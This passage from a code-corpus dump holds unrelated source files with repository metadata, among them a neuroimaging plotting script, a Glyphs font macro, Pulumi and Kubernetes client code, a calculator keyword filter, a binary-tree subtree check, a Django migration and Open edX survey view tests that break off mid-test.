plt.yticks(np.arange(0, len(labels)))
# display labels for brain regions
ax.set_xticklabels(labels, rotation=90)
ax.set_yticklabels(labels)
# Turn off all the ticks
ax = plt.gca()
for t in ax.xaxis.get_major_ticks():
t.tick1On = False
t.tick2On = False
for t in ax.yaxis.get_major_ticks():
t.tick1On = False
t.tick2On = False
# initialize new figure for histogram
fig = plt.figure('Average of FC differences (TB-RS)')
ax = fig.add_subplot(111)
# flatten the numpy cross-correlation matrix
corr_mat = np.ma.ravel(fc_diff_mean)
# remove masked elements from cross-correlation matrix
corr_mat = np.ma.compressed(corr_mat)
# plot a histogram to show the frequency of correlations
plt.hist(corr_mat, 25)
plt.xlabel('Correlation Coefficient')
plt.ylabel('Number of occurrences')
plt.axis([-1, 1, 0, 130])
# initialize new figure scatter plot of xcorr_rs average vs xcorr_tb average
fig = plt.figure()
ax = fig.add_subplot(111)
# apply mask to get rid of upper triangle, including main diagonal
mask = np.tri(xcorr_rs_avg.shape[0], k=0)
mask = np.transpose(mask)
xcorr_rs_avg = np.ma.array(xcorr_rs_avg, mask=mask) # mask out upper triangle
xcorr_tb_avg = np.ma.array(xcorr_tb_avg, mask=mask) # mask out upper triangle
# flatten the numpy cross-correlation arrays
corr_mat_RS = np.ma.ravel(xcorr_rs_avg)
corr_mat_TB = np.ma.ravel(xcorr_tb_avg)
# remove masked elements from cross-correlation arrays
corr_mat_RS = np.ma.compressed(xcorr_rs_avg)
corr_mat_TB = np.ma.compressed(xcorr_tb_avg)
# plot a scatter plot to show how averages of xcorr1 and xcorr2 correlate
plt.scatter(corr_mat_RS, corr_mat_TB)
plt.xlabel('Resting-State')
plt.ylabel('Task-Based')
plt.axis([-1,1,-1,1])
# calculate and print kurtosis
print '\nResting-State Fishers kurtosis: ', kurtosis(corr_mat, fisher=True)
print 'Resting-State Skewness: ', skew(corr_mat)
# Show the plots on the screen
plt.show()
|
[
"xinlong0513@163.com"
] |
xinlong0513@163.com
|
2217ee76daecfe84f81849ca7bcda17568b04510
|
7bc004d6e22ccec582f2fb7f6651a4034feff4f5
|
/Interpolation/Other/New Tab with Masters of Selected Glyphs.py
|
9cc9c627ea19d4987f713d9fc33c2ca3ba19dc8e
|
[
"Apache-2.0"
] |
permissive
|
beppeartz/Glyphs-Scripts
|
d7102291b2bd6bda2680aaeadac4133ddef82327
|
e248fb0701949473dfde358ee83acf3a564c9d55
|
refs/heads/master
| 2022-01-13T22:07:28.532747
| 2021-12-27T22:01:11
| 2021-12-27T22:01:11
| 40,445,584
| 0
| 0
| null | 2015-08-09T18:06:09
| 2015-08-09T18:06:09
| null |
UTF-8
|
Python
| false
| false
| 467
|
py
|
#MenuTitle: New Tab with Masters of Selected Glyphs
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
__doc__="""
Opens a new Edit tab containing all masters of selected glyphs.
"""
import masterNavigation as nav
thisFont = Glyphs.font # frontmost font
if thisFont and thisFont.selectedLayers:
glyphNames = [l.parent.name for l in Font.selectedLayers if l.parent and l.parent.name]
nav.showAllMastersOfGlyphs( glyphNames )
|
[
"res@glyphsapp.com"
] |
res@glyphsapp.com
|
337be842715a37c45179d4aa5d8920ef90f7b136
|
82b946da326148a3c1c1f687f96c0da165bb2c15
|
/sdk/python/pulumi_azure_native/elastic/v20200701preview/_enums.py
|
f335bf9639b12e949bd76fca9ff7ea773793f0e6
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
morrell/pulumi-azure-native
|
3916e978382366607f3df0a669f24cb16293ff5e
|
cd3ba4b9cb08c5e1df7674c1c71695b80e443f08
|
refs/heads/master
| 2023-06-20T19:37:05.414924
| 2021-07-19T20:57:53
| 2021-07-19T20:57:53
| 387,815,163
| 0
| 0
|
Apache-2.0
| 2021-07-20T14:18:29
| 2021-07-20T14:18:28
| null |
UTF-8
|
Python
| false
| false
| 1,075
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'ManagedIdentityTypes',
'MonitoringStatus',
'ProvisioningState',
'TagAction',
]
class ManagedIdentityTypes(str, Enum):
"""
Managed identity type.
"""
SYSTEM_ASSIGNED = "SystemAssigned"
class MonitoringStatus(str, Enum):
"""
Flag specifying if the resource monitoring is enabled or disabled.
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
class ProvisioningState(str, Enum):
"""
Provisioning state of the monitoring tag rules.
"""
ACCEPTED = "Accepted"
CREATING = "Creating"
UPDATING = "Updating"
DELETING = "Deleting"
SUCCEEDED = "Succeeded"
FAILED = "Failed"
CANCELED = "Canceled"
DELETED = "Deleted"
NOT_SPECIFIED = "NotSpecified"
class TagAction(str, Enum):
"""
Valid actions for a filtering tag.
"""
INCLUDE = "Include"
EXCLUDE = "Exclude"
|
[
"noreply@github.com"
] |
morrell.noreply@github.com
|
32c25525e3d4a909105ca7adf465fa65d2316389
|
fb909b0716f62ae118afa7d505cbcbd28f62bc63
|
/venv/lib/python3.6/site-packages/tracking/migrations/0040_auto_20201031_0439.py
|
3f0a6705ae023c6014d6e71b02ccf0bc7cc31a78
|
[] |
no_license
|
dkalola/JustAsk-Final
|
a5b951462cd3c88eb84320bb8fcf10c32f959090
|
c2e7c2ffae4d3c2d870d5ba5348a6bae62db5319
|
refs/heads/main
| 2023-05-24T16:02:17.425251
| 2021-06-16T19:33:52
| 2021-06-16T19:33:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 728
|
py
|
# Generated by Django 3.1.1 on 2020-10-31 04:39
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('tracking', '0039_auto_20201031_0438'),
]
operations = [
migrations.AlterField(
model_name='visitor',
name='last_update',
field=models.DateTimeField(default=datetime.datetime(2020, 10, 31, 4, 39, 1, 444344, tzinfo=utc)),
),
migrations.AlterField(
model_name='visitor',
name='session_start',
field=models.DateTimeField(default=datetime.datetime(2020, 10, 31, 4, 39, 1, 444306, tzinfo=utc)),
),
]
|
[
"divyanshukalola88@gmail.com"
] |
divyanshukalola88@gmail.com
|
d80d5e79d8651a54d21a6514d4614a3945acca00
|
5381c2f94c9c11a0b9678378bbf0ea783f6969f8
|
/calc/pycalc/safe.py
|
dbc124b5af8cac08b789bd2fe4c7cbe9d55af647
|
[] |
no_license
|
Bowserinator/AegisCommand
|
ccdcf2807e63e633bd9bb261699ff18d79bc275f
|
2b226751f6302361cffef42378be4174621e372a
|
refs/heads/master
| 2021-01-02T23:45:47.845299
| 2017-08-06T19:05:30
| 2017-08-06T19:05:30
| 99,507,460
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,831
|
py
|
"""Safety script to delete unsafe variables in the code
Kinda useless but I guess some people would find it better to have it"""
unsafe = [
"__import__",
"import",
"decode",
"encode",
"eval",
"exec",
"open",
"sys",
"os",
"file",
"imp",
"class",
"assert",
"def",
"del",
"global",
"raise",
"with",
"while",
"return",
"yeild",
"from",
"pass",
"lambda",
"nonlocal"
]
from functions import *
from complexdecimal import ComplexDecimal
from date import Date
"""Define list of allowed functions in calc"""
safe_dict = {}
safe_dict["sin"] = sin
safe_dict["cos"] = cos
safe_dict["tan"] = tan
safe_dict["asin"] = asin
safe_dict["acos"] = acos
safe_dict["atan"] = atan
safe_dict["sinh"] = sinh
safe_dict["cosh"] = cosh
safe_dict["tanh"] = tanh
safe_dict["asinh"] = asinh
safe_dict["acosh"] = acosh
safe_dict["atanh"] = atanh
safe_dict["sqrt"] = sqrt
safe_dict["abs"] = abs
safe_dict["log"] = log
safe_dict["fact"] = factorial
safe_dict["factorial"] = factorial
safe_dict["double_fact"] = double_fact
safe_dict["ceil"] = ceil
safe_dict["floor"] = floor
safe_dict["exp"] = exp
safe_dict["ln"] = ln
safe_dict["deg"] = degree
safe_dict["rad"] = radian
safe_dict["degrees"] = degree
safe_dict["radians"] = radian
safe_dict["grad_to_rad"] = grad_to_rad
safe_dict["rad_to_grad"] = rad_to_grad
safe_dict["isPrime"] = isPrime
safe_dict["nCr"] = nCr
safe_dict["nPr"] = nPr
safe_dict["round"] = round
safe_dict["Re"] = Re
safe_dict["Im"] = Im
safe_dict["conj"] = conj
safe_dict["random"] = rand
safe_dict["uniform"] = uniform
safe_dict["gcf"] = gcf
safe_dict["gcd"] = gcf
safe_dict["hcf"] = gcf
safe_dict["lcm"] = lcm
safe_dict["factor"] = factors
safe_dict["ComplexDecimal"] = ComplexDecimal
safe_dict["Date"] = Date
safe_dict["Time"] = Date
|
[
"bowserinator@gmail.com"
] |
bowserinator@gmail.com
|
6ff64b329113605c8ac4da135caca84159e6afe4
|
aa5050aeccdd649730c1163e56e98bcd919e460d
|
/Tree/树的子结构/HasSubtree.py
|
dba29b7948a5854b5f3feb5909279e8b7ae2c156
|
[] |
no_license
|
darrenzhang1007/Algorithm
|
482ad837fc7135ba521d73f21989d2326953d506
|
8e121225b7952ef0aa45d2d4970874be944ae93a
|
refs/heads/master
| 2022-12-02T17:44:41.934246
| 2020-08-16T15:43:42
| 2020-08-16T15:43:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,614
|
py
|
# -*- coding:utf-8 -*-
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def HasSubtree(self, pRoot1, pRoot2):
# write code here
if pRoot2 is None or pRoot1 is None:
return False
def hasEqual(pRoot1, pRoot2):
if pRoot1 is None:
return False
if pRoot1.val == pRoot2.val:
if pRoot2.left is None:
leftEqual = True
else:
leftEqual = hasEqual(pRoot1.left, pRoot2.left)
if pRoot2.right is None:
rightEqual = True
else:
rightEqual = hasEqual(pRoot1.right, pRoot2.right)
return leftEqual and rightEqual
return False
if pRoot2.val == pRoot1.val:
ret = hasEqual(pRoot1, pRoot2)
if ret:
return True
ret = self.HasSubtree(pRoot1.left, pRoot2)
if ret:
return True
ret = self.HasSubtree(pRoot1.right, pRoot2)
return ret
if __name__ == '__main__':
t1 = TreeNode(1)
t2 = TreeNode(2)
t3 = TreeNode(3)
t4 = TreeNode(4)
t5 = TreeNode(5)
t6 = TreeNode(6)
t7 = TreeNode(7)
t8 = TreeNode(8)
t9 = TreeNode(3)
t10 = TreeNode(6)
t11 = TreeNode(7)
t1.left = t2
t1.right = t3
t2.left = t4
t2.right = t5
t3.left = t6
t3.right = t7
t6.right = t8
t9.left = t10
t9.right = t11
s = Solution()
print(s.HasSubtree(t1, t9))
|
[
"785320051@qq.com"
] |
785320051@qq.com
|
6687abcc4ee980ffd28c09a14f24077d5e749ae6
|
42b9bafc3c757543328d93fb60269ad4255aae17
|
/cashier/resources.py
|
c2beeae2162a11491ed2aae2133b94bc811190ed
|
[
"MIT"
] |
permissive
|
mejeng/kasir
|
4fe66d1828e72b64d770426d71185cdd3c54127e
|
cc6f9158b61c0cb45078ddf798af9588c8771311
|
refs/heads/master
| 2020-09-25T03:36:10.144439
| 2019-11-30T07:59:23
| 2019-11-30T07:59:23
| 225,908,795
| 2
| 0
|
MIT
| 2019-12-04T16:21:15
| 2019-12-04T16:21:15
| null |
UTF-8
|
Python
| false
| false
| 174
|
py
|
from import_export import resources
from .models import DaftarTransaksi
class TransactionResources(resources.ModelResource):
class Meta:
model = DaftarTransaksi
|
[
"slashsdull@gmail.com"
] |
slashsdull@gmail.com
|
98a517e82787535c19015d8f41d39aa87c68a537
|
6e47be4e22ab76a8ddd7e18c89f5dc4f18539744
|
/venv/openshift/lib/python3.6/site-packages/kubernetes/client/models/v1_server_address_by_client_cidr.py
|
6997dea23e00ca144b27a0e500d5e3e95206dbf1
|
[] |
no_license
|
georgi-mobi/redhat_ocp4.5_training
|
21236bb19d04a469c95a8f135188d3d1ae473764
|
2ccaa90e40dbbf8a18f668a5a7b0d5bfaa1db225
|
refs/heads/main
| 2023-03-30T10:47:08.687074
| 2021-04-01T05:25:49
| 2021-04-01T05:25:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,650
|
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.12.11
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1ServerAddressByClientCIDR(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'client_cidr': 'str',
'server_address': 'str'
}
attribute_map = {
'client_cidr': 'clientCIDR',
'server_address': 'serverAddress'
}
def __init__(self, client_cidr=None, server_address=None):
"""
V1ServerAddressByClientCIDR - a model defined in Swagger
"""
self._client_cidr = None
self._server_address = None
self.discriminator = None
self.client_cidr = client_cidr
self.server_address = server_address
@property
def client_cidr(self):
"""
Gets the client_cidr of this V1ServerAddressByClientCIDR.
The CIDR with which clients can match their IP to figure out the server address that they should use.
:return: The client_cidr of this V1ServerAddressByClientCIDR.
:rtype: str
"""
return self._client_cidr
@client_cidr.setter
def client_cidr(self, client_cidr):
"""
Sets the client_cidr of this V1ServerAddressByClientCIDR.
The CIDR with which clients can match their IP to figure out the server address that they should use.
:param client_cidr: The client_cidr of this V1ServerAddressByClientCIDR.
:type: str
"""
if client_cidr is None:
raise ValueError("Invalid value for `client_cidr`, must not be `None`")
self._client_cidr = client_cidr
@property
def server_address(self):
"""
Gets the server_address of this V1ServerAddressByClientCIDR.
Address of this server, suitable for a client that matches the above CIDR. This can be a hostname, hostname:port, IP or IP:port.
:return: The server_address of this V1ServerAddressByClientCIDR.
:rtype: str
"""
return self._server_address
@server_address.setter
def server_address(self, server_address):
"""
Sets the server_address of this V1ServerAddressByClientCIDR.
Address of this server, suitable for a client that matches the above CIDR. This can be a hostname, hostname:port, IP or IP:port.
:param server_address: The server_address of this V1ServerAddressByClientCIDR.
:type: str
"""
if server_address is None:
raise ValueError("Invalid value for `server_address`, must not be `None`")
self._server_address = server_address
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1ServerAddressByClientCIDR):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
[
"student@workstation.lab.example.com"
] |
student@workstation.lab.example.com
|
83d741e529035424bfb173e6f1d599799aa25c89
|
7c15f211adc9e9eb9f66ccdd570c9f38dff7ea8d
|
/packages/autorest.python/test/vanilla/version-tolerant/Expected/AcceptanceTests/RequiredOptionalVersionTolerant/requiredoptionalversiontolerant/_client.py
|
76b0fc3cb80ffb00dc5a9f3edc0074f398f2c82d
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
Azure/autorest.python
|
cc4bfbf91ae11535731cad37cedd6b733edf1ebd
|
a00d7aaa3753ef05cb5a0d38c664a90869478d44
|
refs/heads/main
| 2023-09-03T06:58:44.246200
| 2023-08-31T20:11:51
| 2023-08-31T20:11:51
| 100,315,955
| 47
| 40
|
MIT
| 2023-09-14T21:00:21
| 2017-08-14T22:58:33
|
Python
|
UTF-8
|
Python
| false
| false
| 4,073
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from copy import deepcopy
from typing import Any, Optional
from azure.core import PipelineClient
from azure.core.rest import HttpRequest, HttpResponse
from ._configuration import AutoRestRequiredOptionalTestServiceConfiguration
from ._serialization import Deserializer, Serializer
from .operations import ExplicitOperations, ImplicitOperations
class AutoRestRequiredOptionalTestService: # pylint: disable=client-accepts-api-version-keyword
"""Test Infrastructure for AutoRest.
:ivar implicit: ImplicitOperations operations
:vartype implicit: requiredoptionalversiontolerant.operations.ImplicitOperations
:ivar explicit: ExplicitOperations operations
:vartype explicit: requiredoptionalversiontolerant.operations.ExplicitOperations
:param required_global_path: number of items to skip. Required.
:type required_global_path: str
:param required_global_query: number of items to skip. Required.
:type required_global_query: str
:param optional_global_query: number of items to skip. Default value is None.
:type optional_global_query: int
:keyword endpoint: Service URL. Default value is "http://localhost:3000".
:paramtype endpoint: str
"""
def __init__( # pylint: disable=missing-client-constructor-parameter-credential
self,
required_global_path: str,
required_global_query: str,
optional_global_query: Optional[int] = None,
*,
endpoint: str = "http://localhost:3000",
**kwargs: Any
) -> None:
self._config = AutoRestRequiredOptionalTestServiceConfiguration(
required_global_path=required_global_path,
required_global_query=required_global_query,
optional_global_query=optional_global_query,
**kwargs
)
self._client: PipelineClient = PipelineClient(base_url=endpoint, config=self._config, **kwargs)
self._serialize = Serializer()
self._deserialize = Deserializer()
self._serialize.client_side_validation = False
self.implicit = ImplicitOperations(self._client, self._config, self._serialize, self._deserialize)
self.explicit = ExplicitOperations(self._client, self._config, self._serialize, self._deserialize)
def send_request(self, request: HttpRequest, **kwargs: Any) -> HttpResponse:
"""Runs the network request through the client's chained policies.
>>> from azure.core.rest import HttpRequest
>>> request = HttpRequest("GET", "https://www.example.org/")
<HttpRequest [GET], url: 'https://www.example.org/'>
>>> response = client.send_request(request)
<HttpResponse: 200 OK>
For more information on this code flow, see https://aka.ms/azsdk/dpcodegen/python/send_request
:param request: The network request you want to make. Required.
:type request: ~azure.core.rest.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to False.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.rest.HttpResponse
"""
request_copy = deepcopy(request)
request_copy.url = self._client.format_url(request_copy.url)
return self._client.send_request(request_copy, **kwargs)
def close(self) -> None:
self._client.close()
def __enter__(self) -> "AutoRestRequiredOptionalTestService":
self._client.__enter__()
return self
def __exit__(self, *exc_details: Any) -> None:
self._client.__exit__(*exc_details)
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
d2741b142ac72bf65915d1fca8e80a9bcbbb454d
|
f3caf3519b410f1ee98d1e55f781bb60132f211a
|
/sesion_4/robotai.py
|
28a2c2718d3e521c57f770af2bd7a7001c1ff91c
|
[] |
no_license
|
diegotriana11/python-master
|
3895f3cc41cf7f0fe474b522162670ec6aaeccba
|
e7b654870896d2c94e2be24d5683574aaf6cb44b
|
refs/heads/master
| 2020-09-07T16:58:02.727670
| 2016-09-25T19:41:58
| 2016-09-25T19:41:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 826
|
py
|
from robot import Robot
import matplotlib.pyplot as plot
import math
class RobotAI(Robot):
def seguir(self, xo, yo):
ux = math.cos(self.t)
uy = math.sin(self.t)
vx = xo - self.x
vy = yo - self.y
d = ux * vx + uy * vy
r = (vx**2 + vy**2)**0.5
if d >= r:
self.girar(-0.8)
elif d < r:
self.girar(0.8)
if abs(math.acos(d / r)) <= 0.8:
self.mover(0.1)
else:
self.mover(0.01)
if __name__ == "__main__":
xo = -5
yo = 4
r = RobotAI(0, 0, 0)
# plot.ion()
while True:
# plot.clf()
plot.axis([-10, 10, -10, 10])
plot.autoscale(False)
r.seguir(xo, yo)
plot.scatter(xo, yo)
r.dibujar()
plot.pause(0.00001)
#r.log()
|
[
"kmmx@hsoft.local"
] |
kmmx@hsoft.local
|
ec9661055806bf608d680c31602cddf4f16afaff
|
b42850bc3e36bbd1683070393582617f2b3cd8e6
|
/Exam_16_08_20/project/software/express_software.py
|
db3c3bd039c77f3f14e0dd0f082a137f77802d9b
|
[] |
no_license
|
marianidchenko/Python_OOP
|
aecca18be6df3850c0efbf2fa6d25bf3ff53ae96
|
547c12cbdad5b8c16fa55bba6c03b71db181ad2b
|
refs/heads/main
| 2023-07-09T05:42:43.863681
| 2021-08-14T14:55:51
| 2021-08-14T14:55:51
| 381,572,168
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 361
|
py
|
from project.software.software import Software
class ExpressSoftware(Software):
TYPE = "Express"
memory_factor = 2
def __init__(self, name, capacity_consumption, memory_consumption):
new_memory = int(memory_consumption * ExpressSoftware.memory_factor)
super().__init__(name, ExpressSoftware.TYPE, capacity_consumption, new_memory)
|
[
"marianidchenko@gmail.com"
] |
marianidchenko@gmail.com
|
d1452747a62b51f3b744fe1e987a746fb2a010b1
|
342a1ec794df5424bfc4f6af2cb8de415068201b
|
/oscar_promotions/conf.py
|
04a41e4cddd3b7b455d944474aaf7f48062c75e4
|
[] |
no_license
|
penta-srl/django-oscar-promotions
|
c5d0b159950189f23852665ce7e3b3a2fe248bd5
|
65bdf39b48409311e7284fc0a12e8b2e17f176dd
|
refs/heads/master
| 2020-07-06T23:48:45.660316
| 2019-07-08T19:23:15
| 2019-07-08T19:23:15
| 203,176,440
| 0
| 0
| null | 2019-08-19T13:16:55
| 2019-08-19T13:16:55
| null |
UTF-8
|
Python
| false
| false
| 717
|
py
|
from oscar.core.loading import get_class
SingleProduct = get_class('oscar_promotions.models', 'SingleProduct')
RawHTML = get_class('oscar_promotions.models', 'RawHTML')
Image = get_class('oscar_promotions.models', 'Image')
PagePromotion = get_class('oscar_promotions.models', 'PagePromotion')
AutomaticProductList = get_class('oscar_promotions.models', 'AutomaticProductList')
HandPickedProductList = get_class('oscar_promotions.models', 'HandPickedProductList')
MultiImage = get_class('oscar_promotions.models', 'MultiImage')
def get_promotion_classes():
return (RawHTML, Image, SingleProduct, AutomaticProductList,
HandPickedProductList, MultiImage)
PROMOTION_CLASSES = get_promotion_classes()
|
[
"sasha@sasha0.ru"
] |
sasha@sasha0.ru
|
d906fab608afb5da22ad7279b6627e64d47fe827
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02686/s748344982.py
|
09fa7e43a826d467f581733c8790139b8003bb68
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 862
|
py
|
# input
N = int(input())
S = [input() for _ in range(N)]
# process
T = []
for s in S:
while '()' in s:
s = s.replace('()', '')
T.append(s)
l1 = []
l2 = []
for t in T:
op = t.find('(')
if op < 0:
op = len(t)
cl = len(t) - op
if cl+op != 0:
if cl <= op:
l1.append((cl, op))
else:
l2.append((op, cl))
l1.sort()
l2.sort(reverse=True)
result = False
x = 0
if len(l1)+len(l2) == 0:
result = True
elif len(l1)>0 and len(l2)>0 and l1[0][0]+l2[-1][0] == 0:
for cl, op in l1:
x -= cl
if x < 0:
break
x += op
if x >= 0:
for op, cl in l2:
x -= cl
if x < 0:
break
x += op
if x == 0:
result = True
# output
print("Yes" if result else "No")
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
988a51826c16601bdc825af89f23a17af69d3daa
|
9d9eb39e6adc35926d9ca5c38d5bbd05ccc6d15b
|
/python/binary_tree/create_balanced_btree.py
|
5e53687e1bcacc998a3609384e40dcbd86054e01
|
[
"Unlicense"
] |
permissive
|
amitsaha/learning
|
8121d60639f64a2a517ffb855d73de083ebfb445
|
4c1d85adf8018465716a1e8a74afadfe5f5528a2
|
refs/heads/master
| 2023-03-07T13:55:12.871756
| 2022-11-08T06:45:23
| 2022-11-08T06:45:23
| 25,386,786
| 6
| 4
|
Unlicense
| 2023-02-25T00:55:16
| 2014-10-18T04:03:55
|
Python
|
UTF-8
|
Python
| false
| false
| 709
|
py
|
'''
Create a balanced binary search tree from a given sorted array
'''
class Node:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
def preorder(root):
print root.value
if root.left:
preorder(root.left)
if root.right:
preorder(root.right)
def create_tree(arr, start, end):
if start > end:
return
mid = int((start + end)/2.0)
root_val = arr[mid]
root = Node(root_val)
root.left = create_tree(arr, start, mid-1)
root.right = create_tree(arr, mid+1, end)
return root
root = create_tree([1, 2, 3], 0, 2)
preorder(root)
root = create_tree([1, 2, 3, 4], 0, 3)
preorder(root)
|
[
"amitsaha.in@gmail.com"
] |
amitsaha.in@gmail.com
|
289e1088e4ac6e54a7bd6c0dc0eb8024313a147a
|
333fac4c6a47b2448eca1017a794c386672a4aba
|
/neighbourapp/migrations/0003_auto_20201103_2036.py
|
b285ede772a02a3b392c5fce9cc0ac7e9b5d8708
|
[
"MIT"
] |
permissive
|
mornicamwende/neighbourhood
|
106412d39b55b52f6cf4fb034e54e294f5de03f9
|
bf85d7afdb77b059856dc7ecc695cb79d8d1ffd0
|
refs/heads/master
| 2023-01-06T01:33:27.812531
| 2020-11-04T13:29:31
| 2020-11-04T13:29:31
| 308,653,821
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 394
|
py
|
# Generated by Django 3.1.2 on 2020-11-03 17:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('neighbourapp', '0002_auto_20201103_2026'),
]
operations = [
migrations.AlterField(
model_name='post',
name='image',
field=models.ImageField(upload_to='media/'),
),
]
|
[
"mornicamwende@gmail.com"
] |
mornicamwende@gmail.com
|
5cfe9617298832ed1cb529b6d28f06ad8c37988c
|
a9e3f3ad54ade49c19973707d2beb49f64490efd
|
/Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/survey/tests/test_views.py
|
bcbf6f04e6125996702cb113e23943703d10372e
|
[
"AGPL-3.0-only",
"AGPL-3.0-or-later",
"MIT"
] |
permissive
|
luque/better-ways-of-thinking-about-software
|
8c3dda94e119f0f96edbfe5ba60ca6ec3f5f625d
|
5809eaca7079a15ee56b0b7fcfea425337046c97
|
refs/heads/master
| 2021-11-24T15:10:09.785252
| 2021-11-22T12:14:34
| 2021-11-22T12:14:34
| 163,850,454
| 3
| 1
|
MIT
| 2021-11-22T12:12:31
| 2019-01-02T14:21:30
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 5,465
|
py
|
"""
Python tests for the Survey views
"""
import json
from collections import OrderedDict
from django.test.client import Client
from django.urls import reverse
from common.djangoapps.student.tests.factories import UserFactory
from lms.djangoapps.survey.models import SurveyAnswer, SurveyForm
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
class SurveyViewsTests(ModuleStoreTestCase):
"""
All tests for the views.py file
"""
def setUp(self):
"""
Set up the test data used in the specific tests
"""
super().setUp()
self.client = Client()
# Create two accounts
self.password = 'abc'
self.student = UserFactory.create(username='student', email='student@test.com', password=self.password)
self.test_survey_name = 'TestSurvey'
self.test_form = '''
<input name="field1" /><input name="field2" /><select name="ddl"><option>1</option></select>
<textarea name="textarea" />
'''
self.student_answers = OrderedDict({
'field1': 'value1',
'field2': 'value2',
'ddl': '1',
'textarea': 'textarea'
})
self.course = CourseFactory.create(
display_name='Test Course',
course_survey_required=True,
course_survey_name=self.test_survey_name
)
self.survey = SurveyForm.create(self.test_survey_name, self.test_form)
self.view_url = reverse('view_survey', args=[self.test_survey_name])
self.postback_url = reverse('submit_answers', args=[self.test_survey_name])
self.client.login(username=self.student.username, password=self.password)
def test_unauthenticated_survey_view(self):
"""
Asserts that an unauthenticated user cannot access a survey
"""
anon_user = Client()
resp = anon_user.get(self.view_url)
assert resp.status_code == 302
def test_survey_not_found(self):
"""
Asserts that if we ask for a Survey that does not exist, then we get a 302 redirect
"""
resp = self.client.get(reverse('view_survey', args=['NonExisting']))
assert resp.status_code == 302
def test_authenticated_survey_view(self):
"""
Asserts that an authenticated user can see the survey
"""
resp = self.client.get(self.view_url)
# is the SurveyForm html present in the HTML response?
self.assertContains(resp, self.test_form)
def test_unauthenticated_survey_postback(self):
"""
Asserts that an anonymous user cannot answer a survey
"""
anon_user = Client()
resp = anon_user.post(
self.postback_url,
self.student_answers
)
assert resp.status_code == 302
def test_survey_postback_to_nonexisting_survey(self):
"""
Asserts that any attempts to post back to a non existing survey returns a 404
"""
resp = self.client.post(
reverse('submit_answers', args=['NonExisting']),
self.student_answers
)
assert resp.status_code == 404
def test_survey_postback(self):
"""
Asserts that a well formed postback of survey answers is properly stored in the
database
"""
resp = self.client.post(
self.postback_url,
self.student_answers
)
assert resp.status_code == 200
data = json.loads(resp.content.decode('utf-8'))
assert 'redirect_url' in data
answers = self.survey.get_answers(self.student)
assert answers[self.student.id] == self.student_answers
def test_strip_extra_fields(self):
"""
Verify that any not expected field name in the post-back is not stored
in the database
"""
data = dict.copy(self.student_answers)
data['csrfmiddlewaretoken'] = 'foo'
data['_redirect_url'] = 'bar'
data['course_id'] = str(self.course.id)
resp = self.client.post(
self.postback_url,
data
)
assert resp.status_code == 200
answers = self.survey.get_answers(self.student)
assert 'csrfmiddlewaretoken' not in answers[self.student.id]
assert '_redirect_url' not in answers[self.student.id]
assert 'course_id' not in answers[self.student.id]
# however we want to make sure we persist the course_id
answer_objs = SurveyAnswer.objects.filter(
user=self.student,
form=self.survey
)
for answer_obj in answer_objs:
